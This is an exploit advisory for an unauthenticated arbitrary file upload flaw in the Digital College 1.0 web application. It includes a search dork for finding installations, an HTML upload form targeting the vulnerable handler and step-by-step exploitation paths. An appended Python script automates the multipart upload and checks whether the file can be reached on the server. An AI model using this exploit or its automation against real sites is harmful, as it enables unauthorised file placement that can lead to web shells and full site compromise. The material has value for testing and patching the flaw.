========================================================================================
# Title: Digital College 1.0 upload Vulnerability
# Author : indoushka
# email: indoushka@hotmail.com
# Dork : Powered by Digital College 1.0 - Magtrb Soft 2010
# Tested on: windows SP2 Français V.(Pnx2 2.0)
# Bug: Upload (unauthenticated arbitrary file upload; the upload handler under /upload/includes/js/files/ accepts files without checking the session or the file type)
# Download : http://www.magtrb.com/
======================Exploit By indoushka =================================
# Exploit:
1 - Go to http://127.0.0.1/upload/includes/js/files/
2 - Use the simple example below: create a plain HTML file uploader and use it to send a file to the server. (The form posts the same userfile[0..2] and sessionid fields the application's own uploader uses; the outer table that the original listing left unclosed is opened here so the page is well-formed.)
==================================================
<html>
<head><title>File Upload Tester</title></head>
<body>
<form enctype="multipart/form-data" action="test.html" method="post">
<table border=0 align="center">
<tr>
<td valign="top" align="center">
<table border=0 align="center" cellpadding=3>
<tr><td><input type="file" name="userfile[0]"></td></tr>
<tr><td><input type="file" name="userfile[1]"></td></tr>
<tr><td><input type="file" name="userfile[2]"></td></tr>
<tr><td colspan=2 align="center">
<input type="hidden" name="sessionid" value="<?= $sid ?>">
<input type="submit">
</td></tr>
</table>
</td>
</tr>
<tr><td>
<p align="center">Please visit <a href="https://www.exploit-db.com/exploits/12568/">http://www.iqs3cur1ty.com</a> by indoushka.
</p>
</td></tr>
</table>
</form>
</body>
</html>
==============================================================
3 - http://127.0.0.1/upload/includes/js/files/upload.php (to upload)
    http://127.0.0.1/upload/includes/js/files/files/uploader.html (to find the uploaded file: the handler stores uploads under files/ with their original name)
Dz-Ghost Team ===== Saoucha * Star08 * Redda * theblind74 * XproratiX * onurozkan * n2n * Meher Assel
====================
Greetz : Exploit-db Team : (loneferret+Exploits+dookie2000ca)
all my friend : His0k4 * Hussin-X * Rafik (www.Tinjah.com) * Yashar (www.sc0rpion.ir)
SoldierOfAllah (www.m4r0c-s3curity.cc) Stake (www.v4-team.com) * r1z (www.sec-r1z.com) * D4NB4R * www.alkrsan.net * MR.SoOoFe * ThE g0bL!N
------------------------------------------------------------------------------------------------------------------------
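The three steps above amount to one multipart POST followed by a GET. The script below is an added example, not part of indoushka's advisory or of the Digital College code: it builds the same multipart/form-data request the HTML tester sends (fields userfile[0..2] and sessionid, copied from the form), posts it to upload.php, and then checks whether the file is reachable at the files/ location the advisory gives in step 3. The host 127.0.0.1, the empty sessionid value (the form normally carries the PHP $sid) and the assumption that the handler keeps the original filename are all assumptions made for illustration.

```python
"""
Added example (not from the advisory or the Digital College project): reproduce
the HTML tester's upload as a script and verify where the file lands.
Assumptions: base URL http://127.0.0.1/upload, field names copied from the
form, empty sessionid, and that the handler stores the file under its
original name in .../includes/js/files/files/.
"""
import os
import urllib.error
import urllib.request
import uuid

# Paths taken from the advisory; the host is an assumption for illustration.
BASE = "http://127.0.0.1/upload"
UPLOAD_URL = BASE + "/includes/js/files/upload.php"
STORAGE_URL = BASE + "/includes/js/files/files/"


def build_multipart(fields, files, boundary=None):
    """Encode text fields [(name, value)] and files
    [(fieldname, filename, content_type, data)] as multipart/form-data.
    Returns (Content-Type header value, body bytes)."""
    boundary = boundary or uuid.uuid4().hex
    crlf = b"\r\n"
    lines = []
    for name, value in fields:
        lines += [b"--" + boundary.encode(),
                  ('Content-Disposition: form-data; name="%s"' % name).encode(),
                  b"", str(value).encode()]
    for name, filename, ctype, data in files:
        lines += [b"--" + boundary.encode(),
                  ('Content-Disposition: form-data; name="%s"; filename="%s"'
                   % (name, filename)).encode(),
                  ("Content-Type: %s" % ctype).encode(),
                  b"", data]
    lines += [b"--" + boundary.encode() + b"--", b""]
    return "multipart/form-data; boundary=" + boundary, crlf.join(lines)


def expected_location(filename, storage_url=STORAGE_URL):
    """URL where step 3 of the advisory says the upload becomes reachable
    (assumes the handler keeps the basename of the original filename)."""
    return storage_url + os.path.basename(filename)


def upload(files, sessionid="", url=UPLOAD_URL, timeout=10):
    """POST the files exactly as the HTML tester would; returns the HTTP status."""
    ctype, body = build_multipart([("sessionid", sessionid)], files)
    req = urllib.request.Request(url, data=body, method="POST",
                                 headers={"Content-Type": ctype})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status
    except urllib.error.HTTPError as e:
        return e.code


def is_reachable(url, timeout=10):
    """True when a GET on url answers 200, i.e. the upload landed as expected."""
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            return resp.status == 200
    except (urllib.error.URLError, OSError):
        return False


if __name__ == "__main__":
    # Harmless text marker, constructed here; it proves the path without
    # dropping executable content on the target.
    marker = ("userfile[0]", "probe.txt", "text/plain", b"upload-check\n")
    print("upload ->", upload([marker]))
    target = expected_location("probe.txt")
    print("file at", target, "reachable:", is_reachable(target))
```

Run it against a test instance only; a 200 on the GET confirms the unauthenticated upload path, and because the form's sessionid is sent empty here, a success also shows the handler does not tie uploads to a session.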